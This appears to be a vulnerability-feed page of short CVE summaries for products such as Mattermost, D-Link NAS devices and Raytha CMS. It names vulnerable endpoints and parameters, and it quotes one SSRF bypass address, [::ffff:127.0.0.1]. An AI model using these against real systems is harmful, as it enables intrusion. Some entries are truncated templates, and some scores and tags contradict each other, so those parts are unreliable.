CVE-2026-32583
MEDIUM
CVSS 5.3
Modern Events Calendar versions up to 7.29.0 contain an access control vulnerability that allows unauthenticated remote attackers to modify data through improperly configured authorization checks. This vulnerability enables attackers to perform unauthorized actions without authentication, affecting all installations of the affected versions. No patch is currently available, requiring organizations to implement alternative mitigation strategies.
Authentication Bypass
Modern Events Calendar
-
CVE-2026-32265
MEDIUM
The BucketsController endpoint in this plugin suffers from an information disclosure vulnerability where unauthenticated attackers possessing a valid CSRF token can enumerate the list of accessible buckets. This exposure allows reconnaissance of cloud storage resources available to the plugin without requiring authentication. Update to version 2.2.5 to resolve this issue.
CSRF
Information Disclosure
Authentication Bypass
-
CVE-2026-32262
MEDIUM
CVSS 4.3
Path traversal in Craft CMS AssetsController allows authenticated users with replaceFiles permission to delete arbitrary files on local filesystems by injecting directory traversal sequences into the targetFilename parameter, potentially affecting files across multiple volumes sharing the same filesystem root. The vulnerability exists because user input is processed by deleteFile() before proper sanitization is applied. Users should upgrade to Craft 4.17.5 or 5.9.11 to resolve this issue.
Path Traversal
-
CVE-2026-30882
MEDIUM
CVSS 6.1
Chamilo LMS versions 1.11.34 and prior contain a Reflected Cross-Site Scripting (XSS) vulnerability in the session category listing page where the keyword parameter is echoed directly into an HTML href attribute without encoding or sanitization. An attacker can inject arbitrary JavaScript by breaking out of the attribute context using a ">" payload, enabling session hijacking, credential theft, or malware distribution to any user who clicks a malicious link. The vulnerability is triggered when pagination controls render for datasets exceeding 20 items, and a patch is available in version 1.11.36.
XSS
Chamilo Lms
-
CVE-2026-30876
MEDIUM
CVSS 5.3
CVE-2026-30876 is a security vulnerability in Chamilo LMS (CVSS 5.3). Remediation should follow standard vulnerability management procedures.
Information Disclosure
Chamilo Lms
-
CVE-2026-29521
MEDIUM
CVSS 5.1
Hereta ETH-IMC408M devices running firmware 1.0.15 and earlier are vulnerable to cross-site request forgery attacks that allow unauthenticated remote attackers to modify device configuration through setup.cgi, including adding RADIUS accounts and altering network settings. The vulnerability exploits missing CSRF protections combined with automatic inclusion of HTTP Basic Authentication credentials, requiring only user interaction to trigger the attack. No patch is currently available.
CSRF
-
CVE-2026-29520
MEDIUM
CVSS 5.1
Reflected XSS in Hereta ETH-IMC408M firmware versions 1.0.15 and earlier enables attackers to inject malicious scripts through the Network Diagnosis ping function's ping_ipaddr parameter. An attacker can craft a malicious link that, when clicked by an authenticated administrator, executes arbitrary JavaScript in their browser session, potentially compromising the device. No patch is currently available.
XSS
-
CVE-2026-29516
MEDIUM
CVSS 4.9
CVE-2026-29516 is a security vulnerability (CVSS 4.9) that allows authenticated attackers. Remediation should follow standard vulnerability management procedures.
PHP
Information Disclosure
Terastation Nas Ts5400r
-
CVE-2026-29513
MEDIUM
CVSS 5.1
Stored XSS in Hereta ETH-IMC408M firmware v1.0.15 and earlier allows authenticated users to execute arbitrary JavaScript in other users' browsers via unsanitized input in the Device Location field on the System Status interface. An attacker with valid credentials can inject malicious scripts that persist and execute when legitimate users access the status page, potentially enabling session hijacking or credential theft. No patch is currently available.
XSS
-
CVE-2026-29510
MEDIUM
CVSS 5.1
Stored XSS in Hereta ETH-IMC408M firmware versions 1.0.15 and earlier enables authenticated attackers to execute arbitrary JavaScript in the System Status interface by injecting malicious code through the Device Name field. The vulnerability affects any user viewing the compromised status page, potentially leading to session hijacking or credential theft. No patch is currently available for this issue.
XSS
-
CVE-2026-28499
MEDIUM
CVSS 6.1
LeafKit's HTML escaping mechanism fails to properly sanitize arrays and dictionaries when rendered via templates, enabling cross-site scripting (XSS) attacks where untrusted data is output unescaped. Applications using LeafKit templates to display user-controlled collections are vulnerable to arbitrary JavaScript execution in user browsers. A patch is available to address this vulnerability.
XSS
-
CVE-2026-28490
MEDIUM
CVSS 6.5
Authlib's implementation of the JWE RSA1_5 key management algorithm contains a padding oracle vulnerability that leaks decryption failures through timing and exception patterns, allowing attackers to decrypt sensitive data without the private key. The library disabled the constant-time protections provided by the underlying cryptography library and raises exceptions before tag validation completes, creating a reliable side-channel. Public exploit code exists for this vulnerability affecting Authlib users in Python and related Oracle products.
Oracle
Python
RCE
Redhat
Suse
-
CVE-2026-27448
MEDIUM
CVSS 5.3
CVE-2026-27448 is a security vulnerability (CVSS 5.3). Remediation should follow standard vulnerability management procedures. Vendor patch is available.
Information Disclosure
Redhat
Suse
-
CVE-2026-26304
MEDIUM
CVSS 4.3
Mattermost versions 11.3.0 and 11.2.2 and earlier fail to properly validate the run_create permission when a playbook ID is empty, allowing authenticated team members to create unauthorized playbook runs through the API. This permission bypass could enable attackers with valid credentials to perform actions they should not be permitted to execute within the platform.
Authentication Bypass
Mattermost
Suse
-
CVE-2026-26246
MEDIUM
CVSS 4.3
Mattermost fails to properly bound memory allocation when processing PSD (Photoshop) image files, allowing authenticated attackers to exhaust server memory and trigger denial of service by uploading a specially crafted PSD file. The vulnerability affects Mattermost versions 11.3.0 and earlier, 11.2.2 and earlier, and 10.11.10 and earlier. With a CVSS score of 4.3 and a low attack complexity requirement, this represents a moderate but exploitable risk for organizations running affected versions where user file upload is permitted.
Denial Of Service
Mattermost
Suse
-
CVE-2026-25783
MEDIUM
CVSS 4.3
Mattermost fails to properly validate User-Agent header tokens in versions 11.3.0 and earlier, 11.2.2 and earlier, and 10.11.10 and earlier, allowing authenticated attackers to trigger request panics through specially crafted User-Agent headers. This denial-of-service vulnerability affects availability but requires prior authentication and results in only low-severity impact. While the CVSS score of 4.3 reflects the low severity, the practical risk depends on whether the application is exposed to untrusted authenticated users and whether automatic exploitation tools are readily available.
Information Disclosure
Mattermost
Suse
-
CVE-2026-25780
MEDIUM
CVSS 4.3
Mattermost versions 11.3.0, 11.2.2, and 10.11.10 and earlier lack proper memory bounds checking when processing DOC file uploads, enabling authenticated attackers to trigger server memory exhaustion and denial of service. An attacker with valid credentials can upload a specially crafted DOC file to exhaust available memory and crash the Mattermost server. This vulnerability currently lacks a patch and affects multiple active versions of the platform.
Denial Of Service
Mattermost
Suse
-
CVE-2026-24692
MEDIUM
CVSS 4.3
A remote code execution vulnerability (CVSS 4.3) that allows guest users without read permissions. Remediation should follow standard vulnerability management procedures.
Authentication Bypass
Mattermost Server
Suse
-
CVE-2026-21991
MEDIUM
CVSS 5.5
The DTrace dtprobed component contains a path traversal vulnerability (CWE-22) that allows local attackers with limited privileges to create arbitrary files on the system by supplying crafted USDT provider names. This vulnerability affects Oracle Linux 8, 9, and 10, and while it carries a CVSS score of 5.5, the EPSS score of 0.01% (percentile 2%) indicates very low exploitation probability in the wild, with no evidence of active exploitation or public proof-of-concept code.
Path Traversal
-
CVE-2026-21386
MEDIUM
CVSS 4.3
CVE-2026-21386 is a security vulnerability (CVSS 4.3) that allows an authenticated team member. Remediation should follow standard vulnerability management procedures.
Information Disclosure
Mattermost Server
Suse
-
CVE-2026-21004
MEDIUM
CVSS 6.9
Smart Switch versions prior to 3.7.69.15 contain an improper authentication vulnerability that allows adjacent network attackers to trigger denial of service conditions without requiring user privileges or interaction. The vulnerability has a CVSS score of 6.9 with medium-to-high availability impact, making it a notable threat in local network environments where Smart Switch is deployed.
Denial Of Service
Authentication Bypass
-
CVE-2026-21002
MEDIUM
CVSS 5.9
Galaxy Store prior to version 4.6.03.8 contains an improper cryptographic signature verification vulnerability that allows a local attacker to install arbitrary applications without proper authorization. An attacker with physical or local access to a device can bypass the signature validation mechanism, enabling installation of malicious or unauthorized apps. While the CVSS score of 5.9 is moderate, the integrity impact is high, making this a meaningful threat to device security and app ecosystem integrity.
Information Disclosure
Jwt Attack
-
CVE-2026-21001
MEDIUM
CVSS 5.9
Galaxy Store versions prior to 4.6.03.8 contain a path traversal vulnerability that enables local attackers to create files with Galaxy Store privileges. This could allow an attacker with local access to escalate their capabilities by writing malicious files in unintended locations. No patch is currently available for this issue.
Path Traversal
-
CVE-2026-20997
MEDIUM
CVSS 5.3
Smart Switch prior to version 3.7.69.15 contains an improper cryptographic signature verification vulnerability that allows remote attackers to bypass authentication mechanisms. The vulnerability has a CVSS score of 5.3 with network-based attack vector and low complexity, requiring only user interaction. While no public exploit or KEV status has been confirmed, the authentication bypass capability presents a moderate risk for unauthorized access to affected devices.
Authentication Bypass
Jwt Attack
-
CVE-2026-20995
MEDIUM
CVSS 5.3
Smart Switch versions prior to 3.7.69.15 contain an exposure of sensitive functionality vulnerability that allows remote attackers to set specific configurations without proper authorization. An unauthenticated attacker can leverage network access to manipulate configuration settings on affected devices, potentially leading to information disclosure and integrity compromise. This vulnerability requires user interaction according to the CVSS vector, suggesting a social engineering or phishing component may be necessary for successful exploitation.
Authentication Bypass
-
CVE-2026-20993
MEDIUM
CVSS 4.8
Samsung Assistant versions prior to 9.3.10.7 contain an improper export of Android application components vulnerability that allows a local attacker with low privilege access to read sensitive saved information from the application. The vulnerability has a CVSS score of 4.8 with low complexity and no user interaction required, making it a moderate-risk issue affecting users on vulnerable Samsung devices. While no active exploitation or public proof-of-concept is documented at this time, the local attack vector and information disclosure impact warrant timely patching.
Information Disclosure
Samsung
Google
-
CVE-2026-20991
MEDIUM
CVSS 4.4
ThemeManager prior to the SMR Mar-2026 Release 1 contains an improper privilege management vulnerability that allows local privileged attackers to inappropriately reuse trial contents, potentially circumventing licensing restrictions or trial period limitations. With a CVSS score of 6.7 and requiring high privileges (PR:H) but no user interaction, this vulnerability poses a moderate integrity risk in environments where multiple privileged users share access to ThemeManager systems. No public proof-of-concept or active exploitation has been reported in the CVE record, and this does not appear on CISA's KEV catalog, suggesting limited real-world weaponization at present.
Information Disclosure
-
CVE-2026-20988
MEDIUM
CVSS 5.0
A broadcast receiver in Android Settings fails to properly verify intents prior to the March 2026 Security Maintenance Release 1, allowing a local attacker with limited privileges to launch arbitrary activities with Settings-level permissions. The vulnerability requires user interaction to trigger and carries a CVSS 4.0 score of 6.8, reflecting high confidentiality and integrity impact. No public exploit or KEV designation is currently documented, but the local attack vector and privilege escalation potential warrant prompt patching.
Information Disclosure
-
CVE-2026-4284
MEDIUM
CVSS 4.7
The PPT File Handler in taoofagi easegen-admin contains a server-side request forgery vulnerability in the downloadFile function that allows authenticated remote attackers to manipulate file URLs and access arbitrary network resources. Public exploit code exists for this vulnerability, and the vendor has not provided patches or updates despite notification. The flaw affects Java-based deployments using the affected rolling release version.
SSRF
Java
-
CVE-2026-4270
MEDIUM
CVSS 5.5
AWS API MCP Server versions 0.2.14 through 1.3.9 contain an improper path protection flaw in the no-access and workdir features that allows local attackers to bypass file access restrictions and read arbitrary files accessible to the MCP client application. An attacker with local access and user interaction can exploit this vulnerability to expose sensitive local file contents. Users should upgrade to version 1.3.9 or later to remediate this issue.
Authentication Bypass
Aws Api Mcp Server
-
CVE-2026-4265
MEDIUM
CVSS 4.3
This vulnerability in Mattermost allows guest users to bypass team-specific file upload permissions through a cross-team file metadata reuse attack. Affected versions include Mattermost 11.3.0, 11.2.x up to 11.2.2, and 10.11.x up to 10.11.10. An authenticated guest user can upload a file in a team where they have upload_file permission, then reuse that file's metadata in POST requests to channels in different teams where they lack upload permission, resulting in unauthorized file posting with potential integrity impact.
Authentication Bypass
Mattermost
-
CVE-2026-4253
MEDIUM
CVSS 4.7
OS command injection in Tenda AC8 16.03.50.11 web interface allows authenticated remote attackers to execute arbitrary commands through the wans.policy.list1 parameter in the /cgi-bin/UploadCfg endpoint. Public exploit code exists for this vulnerability and no patch is currently available.
Tenda
Command Injection
-
CVE-2026-4241
MEDIUM
CVSS 6.3
SQL injection in itsourcecode College Management System 1.0 allows authenticated attackers to manipulate the course_code parameter in /admin/time-table.php and execute arbitrary SQL commands remotely. Public exploit code exists for this vulnerability, and no patch is currently available. The attack requires valid credentials but can lead to unauthorized data access, modification, or deletion within the application database.
PHP
SQLi
-
CVE-2026-4240
MEDIUM
CVSS 5.3
Denial of service in Open5GS through version 2.7.6 affects the CCA Handler component's callback functions, allowing unauthenticated remote attackers to crash the service. Public exploit code is available for this vulnerability. Upgrading to version 2.7.7 resolves the issue.
Denial Of Service
-
CVE-2026-4238
MEDIUM
CVSS 4.7
SQL injection in itsourcecode College Management System 1.0 via the course_code parameter in /admin/courses.php allows authenticated administrators to execute arbitrary database queries remotely. Public exploit code exists for this vulnerability, and no patch is currently available. The attack requires high-level privileges but could enable data exfiltration or manipulation.
SQLi
PHP
College Management System
-
CVE-2026-4234
MEDIUM
CVSS 6.3
SQL injection in SSCMS 7.4.0 via the tableHandWrite parameter in SitesAddController.Submit.cs allows authenticated remote attackers to execute arbitrary SQL commands. Public exploit code exists for this vulnerability, and no patch is currently available from the vendor despite early disclosure notification.
SQLi
Remote Code Execution
Sscms
-
CVE-2026-4233
MEDIUM
CVSS 4.3
Path traversal in ThingsGateway 12's /api/file/download endpoint allows authenticated users to read arbitrary files through manipulation of the fileName parameter. Public exploit code exists for this vulnerability, and no patch is currently available from the vendor despite early notification.
Path Traversal
Information Disclosure
Thingsgateway
-
CVE-2026-4230
MEDIUM
CVSS 6.3
SQL injection in Vanna up to version 2.0.2 allows authenticated remote attackers to execute arbitrary SQL queries through the update_sql endpoint function. Public exploit code exists for this vulnerability, and the vendor has not released a patch despite early notification. An authenticated attacker can leverage this to read, modify, or delete database contents depending on the application's database permissions.
Python
SQLi
AI / ML
Vanna
-
CVE-2026-4228
MEDIUM
CVSS 6.3
Command injection in LB-LINK BL-WR9000 2.4.9 via the /goform/set_wifi endpoint allows authenticated remote attackers to execute arbitrary commands with network access. Public exploit code is available for this vulnerability, and no patch has been released by the vendor despite early disclosure notification.
Command Injection
-
CVE-2026-4224
MEDIUM
CVSS 6.0
A buffer overflow vulnerability (CVSS 6.0). Remediation should follow standard vulnerability management procedures.
Buffer Overflow
-
CVE-2026-4216
MEDIUM
CVSS 5.3
Hard-coded credentials exist in the i-SENS SmartLog Android application (versions up to 2.6.8) within a developer mode function used for Bluetooth pairing configuration between blood glucose meters and the mobile app. An attacker with local access and low privileges can exploit this to obtain credentials, potentially compromising the integrity and confidentiality of health data. A public proof-of-concept is available, though the CVSS 5.3 score and local-only attack vector limit immediate widespread exploitation risk.
Google
Information Disclosure
Smartlog App
Android
-
CVE-2026-4215
MEDIUM
CVSS 6.3
Server-side request forgery in FlowCI flow-core-x up to version 1.23.01 allows authenticated remote attackers to conduct SSRF attacks through the SMTP Host Handler configuration function. Public exploit code exists for this vulnerability and the vendor has not released a patch. An attacker with valid credentials can manipulate the system to make arbitrary outbound requests from the affected server.
Java
SSRF
Flow Core X
-
CVE-2026-4210
MEDIUM
CVSS 6.3
Command injection in D-Link NAS devices (DNS-320, DNS-327L, DNS-345 and others) through the time_machine.cgi script allows authenticated remote attackers to execute arbitrary commands with network access. Public exploit code exists for this vulnerability, and no patch is currently available.
D-Link
Command Injection
RCE
Dns 320
Dns 345
-
CVE-2026-4209
MEDIUM
CVSS 6.3
Command injection in D-Link NAS devices (DNS-120, DNS-325, DNR-322L, DNS-327L and others) allows authenticated remote attackers to execute arbitrary commands through multiple user and group management CGI functions. Public exploit code exists for this vulnerability, and patches are not currently available. An attacker with valid credentials could leverage this to compromise the NAS system and potentially access or manipulate stored data.
D-Link
Command Injection
RCE
Dns 325
Dnr 322l
-
CVE-2026-4207
MEDIUM
CVSS 6.3
Command injection in D-Link NAS devices (DNS-320, DNS-325, DNS-343, DNR-322L and others) through the /cgi-bin/system_mgr.cgi interface allows authenticated remote attackers to execute arbitrary commands. Public exploit code exists for this vulnerability, and no patch is currently available.
D-Link
Command Injection
RCE
Dnr 322l
Dns 325
-
CVE-2026-4206
MEDIUM
CVSS 6.3
A security vulnerability (CVSS 6.3). Risk factors: public PoC available.
D-Link
Command Injection
RCE
Dns 315l
Dns 325
-
CVE-2026-4205
MEDIUM
CVSS 6.3
A security vulnerability (CVSS 6.3). Risk factors: public PoC available.
Command Injection
D-Link
RCE
Ftp
Dns 320
-
CVE-2026-4204
MEDIUM
CVSS 6.3
A security flaw (CVSS 6.3). Risk factors: public PoC available.
Command Injection
D-Link
RCE
Dns 726 4
Dns 323
-
CVE-2026-4203
MEDIUM
CVSS 6.3
Command injection in D-Link DNS and DNR network attached storage devices allows authenticated remote attackers to execute arbitrary commands through multiple CGI functions in the network management interface. The vulnerability affects numerous models up to firmware version 20260205, and public exploit code is available. An attacker with valid credentials can leverage this to compromise device integrity and potentially access the network.
Command Injection
D-Link
RCE
Dhcp
Dns
-
CVE-2026-4199
MEDIUM
CVSS 5.3
Command injection in bazinga012 mcp_code_executor up to version 0.3.0 allows local attackers with user-level privileges to execute arbitrary commands through the installDependencies function in src/index.ts. Public exploit code exists for this vulnerability, affecting Python and Node.js environments. A patch is available and should be applied to remediate this local privilege escalation risk.
Command Injection
RCE
Python
Node.js
Mcp Code Executor
-
CVE-2026-4198
MEDIUM
CVSS 5.3
Local command injection in hypermodel-labs mcp-server-auto-commit 1.0.0 via the getGitChanges function in index.ts allows authenticated local attackers to execute arbitrary commands with the privileges of the affected process. Public exploit code exists for this vulnerability, and the vendor has not yet released a patch despite early notification.
Command Injection
-
CVE-2026-4197
MEDIUM
CVSS 6.3
Command injection in D-Link NAS devices (DNS-120, DNR-202L, DNS-315L, DNS-320 series, DNS-325 series, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05, and DNS-1550-04 up to firmware version 20260205) allows authenticated remote attackers to execute arbitrary commands through the /cgi-bin/download_mgr.cgi file's RSS management functions. Public exploit code exists for this vulnerability, and no patch is currently available.
D-Link
Command Injection
RCE
-
CVE-2026-4196
MEDIUM
CVSS 6.3
Command injection in D-Link NAS devices (DNS-120, DNR-202L, DNS-315L, DNS-320 series, DNS-323-327L, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05, DNS-1550-04 through firmware version 20260205) allows authenticated remote attackers to execute arbitrary commands via the /cgi-bin/remote_backup.cgi backup scheduling functions. Public exploit code exists for this vulnerability and no patch is currently available.
D-Link
Command Injection
RCE
-
CVE-2026-4195
MEDIUM
CVSS 6.3
Command injection in D-Link NAS devices (DNS-120, DNR-202L, DNS-315L, DNS-320 series, DNS-323 through DNS-1550-04 with firmware prior to 20260205) allows authenticated remote attackers to execute arbitrary commands via the /cgi-bin/wizard_mgr.cgi endpoint. Public exploit code is available and no patch is currently available for affected users.
D-Link
Command Injection
RCE
-
CVE-2026-4193
MEDIUM
CVSS 6.9
Improper access control in D-Link DIR-823G 1.0.2B05's goahead component allows unauthenticated remote attackers to manipulate multiple configuration functions including firewall, network, and security settings. The vulnerability affects a wide range of device management functions and has been publicly disclosed with no patch currently available. Affected organizations should implement network segmentation and access controls to limit exposure to this remotely exploitable flaw.
D-Link
Information Disclosure
-
CVE-2026-3644
MEDIUM
CVSS 6.0
CVE-2026-3644 is a security vulnerability (CVSS 6.0). Remediation should follow standard vulnerability management procedures.
Authentication Bypass
-
CVE-2026-3111
MEDIUM
CVSS 6.9
An Insecure Direct Object Reference (IDOR) vulnerability exists in Campus Educativa at the endpoint '/archivos/usuarios/[ID]/[username]/thumb_AAxAA.jpg' that allows unauthenticated attackers to enumerate and download profile photographs of all users by manipulating URL parameters. Successful exploitation enables mass collection of user photos for identity impersonation, social engineering, facial recognition-based identity linking across platforms, and doxxing attacks. With a CVSS score of 6.9 and no authentication required, this vulnerability poses a moderate-to-significant risk to user privacy and security.
Information Disclosure
Campus
-
CVE-2026-3024
MEDIUM
CVSS 4.8
A Stored Cross-Site Scripting (XSS) vulnerability exists in the Wakyma veterinary web application at the endpoint 'vets.wakyma.com/configuracion/agenda/modelo-formulario-evento', allowing authenticated users with low privileges to inject malicious scripts that persist in the application and execute in the browsers of other users, potentially enabling unauthorized data access and privilege escalation across the veterinary team. The vulnerability has a CVSS v4.0 base score of 4.8 (low-to-medium severity) but poses meaningful organizational risk due to its stored nature and the ability for low-privileged users to affect higher-privileged team members. No public exploit code or active exploitation in the wild has been reported at this time, though the attack requires only Network access and user interaction, making it feasible for insider threats.
XSS
Privilege Escalation
Information Disclosure
Wakyma Application Web
-
CVE-2026-3023
MEDIUM
CVSS 5.3
A non-relational SQL injection (NoSQLi) vulnerability exists in the Wakyma web application's 'vets.wakyma.com/pets/print-tags' endpoint that allows authenticated users to inject NoSQL commands via manipulated POST requests. An attacker with valid credentials can exploit this vulnerability to extract sensitive information including pet names and owner names from the backend database. With a CVSS score of 5.3 and low attack complexity, this represents a moderate confidentiality risk requiring prompt remediation despite the requirement for authentication.
SQLi
Wakyma Application Web
-
CVE-2026-3021
MEDIUM
CVSS 6.5
A non-relational SQL injection (NoSQLi) vulnerability exists in the Wakyma web application at the endpoint 'vets.wakyma.com/centro/equipo/empleado' that allows authenticated users to inject NoSQL commands and enumerate sensitive employee data. The vulnerability has a CVSS 4.0 score of 7.1 (High) with network attack vector requiring low privileges. No proof-of-concept code, EPSS data, or KEV listing information is currently available for this vulnerability.
SQLi
Nosql Injection
-
CVE-2026-2578
MEDIUM
CVSS 4.3
Mattermost versions 11.3.x up to and including 11.3.0 contain an information disclosure vulnerability where burn-on-read posts fail to maintain their redacted state when deleted, allowing authenticated channel members to view previously hidden message contents through WebSocket post deletion events. The vulnerability requires low-privilege authenticated access and results in confidentiality loss of sensitive communications that were intentionally designed to be self-destructing. With a CVSS score of 4.3 and network-based attack vector, this represents a meaningful but contained risk primarily affecting organizations relying on Mattermost's burn-on-read feature for secure internal communications.
Information Disclosure
Mattermost
Suse
-
CVE-2026-2463
MEDIUM
CVSS 4.3
Mattermost fails to properly validate user permissions when filtering invite IDs during team creation, allowing authenticated users to bypass access controls and register unauthorized accounts using leaked or discovered invite tokens. Affected versions include Mattermost 11.3.0 and earlier in the 11.3.x branch, 11.2.2 and earlier in the 11.2.x branch, and 10.11.10 and earlier in the 10.11.x branch. An authenticated attacker with knowledge of valid invite IDs can circumvent intended access restrictions to create accounts that should be restricted, resulting in unauthorized account registration and potential lateral movement within the Mattermost instance.
Authentication Bypass
Mattermost
Suse
-
CVE-2026-2462
MEDIUM
CVSS 6.6
This vulnerability in Mattermost allows unauthenticated attackers to achieve remote code execution and exfiltrate sensitive credentials through malicious plugin installation on CI test instances that retain default admin credentials. Affected versions include Mattermost 10.11.x through 10.11.10, 11.2.x through 11.2.2, and 11.3.0, with the core issue stemming from insufficient access controls on plugin installation combined with default credential exposure. An attacker can upload a malicious plugin after modifying the import directory to gain full system compromise and access AWS and SMTP credentials stored in configuration files.
RCE
Authentication Bypass
Mattermost
-
CVE-2026-2461
MEDIUM
CVSS 4.3
Mattermost Plugins versions 11.3 and earlier fail to implement proper authorization checks on comment block modifications, allowing authenticated users with editor permissions to modify comments created by other board members without restriction. An authorized attacker can alter or tamper with comments from colleagues, potentially modifying project records, discussions, or audit trails. With a CVSS score of 4.3 and low attack complexity, this represents a moderate integrity risk in collaborative environments where comment authenticity is important, though exploitation requires prior authentication and editor-level access.
Authentication Bypass
Suse
-
CVE-2026-2458
MEDIUM
CVSS 4.3
This vulnerability is an improper access control flaw in Mattermost's channel search functionality that allows removed team members to enumerate all public channels within private teams. Affected versions include Mattermost 11.3.x through 11.3.0, 11.2.x through 11.2.2, and 10.11.x through 10.11.10. An authenticated attacker who has been removed from a team can query the channel search API endpoint to discover the complete list of public channels in that private team, resulting in information disclosure without requiring elevated privileges.
Authentication Bypass
Mattermost
Suse
-
CVE-2026-2457
MEDIUM
CVSS 4.3
Mattermost fails to properly sanitize client-supplied post metadata in its post update API endpoint, allowing authenticated attackers to spoof permalink embeds and impersonate other users through crafted PUT requests. The vulnerability affects Mattermost versions 11.3.0 and earlier, 11.2.2 and earlier, and 10.11.10 and earlier. While the CVSS score of 4.3 is moderate and requires authentication, the integrity impact allows attackers to deceive users by falsely attributing messages to legitimate users, potentially facilitating social engineering or misinformation campaigns within Mattermost instances.
Information Disclosure
Mattermost
Suse
-
CVE-2026-2456
MEDIUM
CVSS 5.3
Mattermost fails to enforce response size limits on integration action endpoints, allowing an authenticated attacker to trigger server memory exhaustion and denial of service by clicking an interactive message button that connects to a malicious integration server returning arbitrarily large responses. This vulnerability affects Mattermost versions 11.3.0, 11.2.x up to 11.2.2, and 10.11.x up to 10.11.10. While the CVSS score of 5.3 is moderate, the attack requires user interaction (UI:R) and network access, but can be reliably triggered by any authenticated user interacting with crafted messages.
Denial Of Service
Mattermost
Suse
-
CVE-2026-2455
MEDIUM
CVSS 4.3
Mattermost Server versions 11.3.0, 11.2.x through 11.2.2, and 10.11.x through 10.11.10 contain a server-side request forgery (SSRF) vulnerability due to improper validation of IPv4-mapped IPv6 addresses, allowing authenticated attackers to bypass reserved IP restrictions and access internal services. An attacker with login credentials can craft requests using IPv6 notation (such as [::ffff:127.0.0.1]) to reach localhost or other restricted internal endpoints that would normally be blocked. No patch is currently available for this vulnerability.
SSRF
Mattermost Server
Suse
-
CVE-2026-2454
MEDIUM
CVSS 5.8
Mattermost versions 11.3.0 and earlier, 11.2.2 and earlier, and 10.11.10 and earlier contain an array length handling vulnerability in the calls plugin that allows unauthenticated remote attackers to trigger out-of-memory (OOM) errors and crash the server by sending maliciously crafted msgpack frames over websocket connections. With a CVSS score of 5.8 and network-based attack vector requiring no privileges or user interaction, this denial-of-service vulnerability poses a moderate but easily exploitable availability risk to any exposed Mattermost deployment.
Denial Of Service
Mattermost
-
CVE-2026-1629
MEDIUM
CVSS 4.3
Mattermost 10.11.x through 10.11.10 fails to clear cached permalink preview data when a user's channel access is revoked, allowing authenticated users to view private channel content through previously cached previews until the cache expires or they re-login. An authenticated attacker who previously had access to a private channel can exploit this to maintain visibility into sensitive channel communications after access removal. A patch is not currently available for this medium-severity vulnerability.
Information Disclosure
Mattermost
-
CVE-2025-69727
MEDIUM
CVSS 5.3
A security vulnerability in INDEX-EDUCATION PRONOTE (CVSS 5.3) that allows the construction of direct URLs. Remediation should follow standard vulnerability management procedures.
Authentication Bypass
-
CVE-2025-69693
MEDIUM
CVSS 5.4
Out-of-bounds read in the RV60 video decoder (libavcodec/rv60dec.c) of FFmpeg 8.0 and 8.0.1.
Buffer Overflow
Information Disclosure
Redhat
Suse
-
CVE-2025-69246
MEDIUM
CVSS 6.9
Raytha CMS lacks brute force protection mechanisms, allowing attackers to conduct unlimited automated login attempts without triggering account lockout, rate limiting, or multi-factor authentication challenges. Versions prior to 1.4.6 are affected, and an attacker can systematically enumerate valid usernames and crack passwords through high-volume credential stuffing attacks. The vulnerability represents a significant authentication bypass risk that could lead to unauthorized administrative access depending on password strength and user enumeration feasibility.
Information Disclosure
Raytha
-
CVE-2025-69245
MEDIUM
CVSS 5.1
Raytha CMS contains a Reflected Cross-Site Scripting (XSS) vulnerability in the logon functionality's returnUrl parameter that allows attackers to inject arbitrary JavaScript code. When an authenticated victim clicks a malicious URL crafted by an attacker, the injected script executes in the victim's browser with the victim's privileges, potentially enabling session hijacking, credential theft, or unauthorized actions within the CMS. The vulnerability was remediated in version 1.4.6, and while no CVSS score or EPSS data is currently available, the nature of XSS in authentication contexts represents a significant security risk requiring prompt patching.
XSS
Open Redirect
Raytha
-
CVE-2025-69243
MEDIUM
CVSS 6.9
Raytha CMS contains a user enumeration vulnerability in its password reset functionality where differing error messages reveal whether a login exists in the system, enabling attackers to build valid user lists for targeted brute force attacks. This vulnerability affects Raytha CMS versions prior to 1.5.0. The moderate CVSS score of 6.9 reflects the information disclosure risk, though real-world impact depends on how attackers chain this enumeration with other attacks.
Information Disclosure
Raytha
-
CVE-2025-69242
MEDIUM
CVSS 5.1
Raytha CMS contains a reflected cross-site scripting (XSS) vulnerability in the backToListUrl parameter that allows unauthenticated attackers to inject arbitrary JavaScript code. When an authenticated victim visits a specially crafted malicious URL, the injected script executes in their browser context, potentially allowing session hijacking, credential theft, or malware distribution. The vulnerability was patched in version 1.4.6, and while the CVSS score of 5.1 is moderate, the attack requires user interaction (UI:A) but no authentication, making it a practical attack vector against admin users.
XSS
Raytha
-
CVE-2025-69241
MEDIUM
CVSS 5.3
Raytha CMS contains a Stored Cross-Site Scripting (XSS) vulnerability in the profile editing functionality, specifically within the FirstName and LastName parameters. An authenticated attacker can inject arbitrary HTML and JavaScript code that persists in the application and executes in the browsers of users viewing the compromised profile, potentially leading to session hijacking, credential theft, or defacement. This vulnerability has been remediated in version 1.4.6.
XSS
Raytha
-
CVE-2025-69239
MEDIUM
CVSS 5.1
Raytha CMS contains a Server-Side Request Forgery (SSRF) vulnerability in its Theme Import from URL feature that allows authenticated high-privilege users to manipulate server-side HTTP requests to arbitrary destinations. An attacker with administrative or similar elevated privileges can leverage this to redirect the CMS server's outbound requests to internal systems, external resources, or arbitrary URLs, potentially leading to information disclosure or lateral movement attacks. The vulnerability affects versions prior to 1.4.6 and is fixed in version 1.4.6 and later.
SSRF
Raytha
-
CVE-2025-69238
MEDIUM
CVSS 6.9
Raytha CMS contains a Cross-Site Request Forgery (CSRF) vulnerability across multiple endpoints that fails to enforce token verification on POST requests. An authenticated user can be tricked into visiting a malicious website crafted by an attacker, which automatically submits unauthorized requests (such as data deletion) to the Raytha CMS application without requiring explicit user confirmation. This vulnerability affects Raytha CMS versions prior to 1.4.6 and has a CVSS score of 6.9 with medium real-world exploitability.
CSRF
Raytha
-
CVE-2025-69237
MEDIUM
CVSS 5.1
Raytha CMS contains a Stored Cross-Site Scripting (XSS) vulnerability in the page creation functionality through the FieldValues[0].Value parameter, allowing authenticated attackers with content creation permissions to inject malicious HTML and JavaScript that executes when other users visit the edited page. The vulnerability affects Raytha CMS versions prior to 1.4.6 and has a CVSS score of 5.1 with limited scope impact due to required authentication and user interaction. While not currently listed in CISA's Known Exploited Vulnerabilities catalog, the low attack complexity and availability of vendor patch make this a moderate but manageable risk for deployed instances.
XSS
Authentication Bypass
Raytha
-
CVE-2025-69236
MEDIUM
CVSS 5.1
